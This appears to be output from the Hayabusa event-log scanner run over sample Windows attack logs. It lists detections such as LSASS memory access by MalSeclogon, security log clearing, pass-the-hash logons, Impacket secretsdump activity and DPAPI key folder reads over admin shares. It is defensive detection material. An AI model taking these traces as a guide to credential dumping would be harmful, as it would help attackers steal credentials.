+2021-12-08 02:33:01.638 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: MSEDGEWIN10\IEUser | Access: 0x100000 | Src PID: 8612 | Src PGUID: 747F3D96-9ACD-61AF-D301-000000000102 | Tgt PID: 6072 | Tgt PGUID: 747F3D96-9ACD-61AF-D501-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x1410 | Src PID: 6072 | Src PGUID: 747F3D96-9ACD-61AF-D501-000000000102 | Tgt PID: 5268 | Tgt PGUID: 747F3D96-9ACD-61AF-D701-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-09 22:41:50.714 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4624-RottenPotatoNG.evtx"
+2021-12-10 03:50:47.980 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.333 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4d5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4fe,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d51f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4fe,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d51f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d532,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:56.005 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2f10a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2f10a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:56.099 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:56.146 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:51:16.683 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9e8 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-12 16:15:28.352 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.716 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8723c7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:15:56.716 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8723c7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.756 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.817 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8723c99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.829 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:58.454 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x33c | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.709 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.714 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
